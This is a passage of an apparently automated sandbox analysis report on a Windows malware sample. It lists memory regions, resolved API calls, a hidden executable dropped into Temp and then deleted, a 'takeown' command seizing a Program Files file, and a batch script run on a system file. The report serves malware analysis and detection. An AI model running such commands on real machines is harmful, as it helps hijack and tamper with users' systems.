| private_0x0000000001fe0000 | 0x01fe0000 | 0x01feffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x740d0000 | 0x74161fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| sysmain.sdb | 0x7fe40000 | 0x7feacfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | os_pid = 0xc28, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x746e1080 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:11:31 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #34: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #34 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Java\se-viii.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:58, Reason: Child Process |
| Unmonitor | End Time: 00:02:01, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7fc |
| Parent PID | 0xeb8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B3C
0x
F20
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000ac0000 | 0x00ac0000 | 0x00adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ae0000 | 0x00ae0000 | 0x00ae1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000af0000 | 0x00af0000 | 0x00b03fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b10000 | 0x00b10000 | 0x00b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b50000 | 0x00b50000 | 0x00b8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b90000 | 0x00b90000 | 0x00b93fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x00ba0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000bb0000 | 0x00bb0000 | 0x00bb1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c50000 | 0x00c50000 | 0x00c5ffff | Private Memory | rw |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f000000 | 0x7f000000 | 0x7f022fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f023000 | 0x7f023000 | 0x7f023fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f02c000 | 0x7f02c000 | 0x7f02efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f02f000 | 0x7f02f000 | 0x7f02ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #35: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #35 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:58, Reason: Child Process |
| Unmonitor | End Time: 00:02:55, Reason: Self Terminated |
| Monitor Duration | 00:00:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x150 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
408
0x
1A4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x0476ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004770000 | 0x04770000 | 0x0478ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004770000 | 0x04770000 | 0x0477ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004780000 | 0x04780000 | 0x04783fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004790000 | 0x04790000 | 0x04791fff | Private Memory | rw |
|
|
|
- |
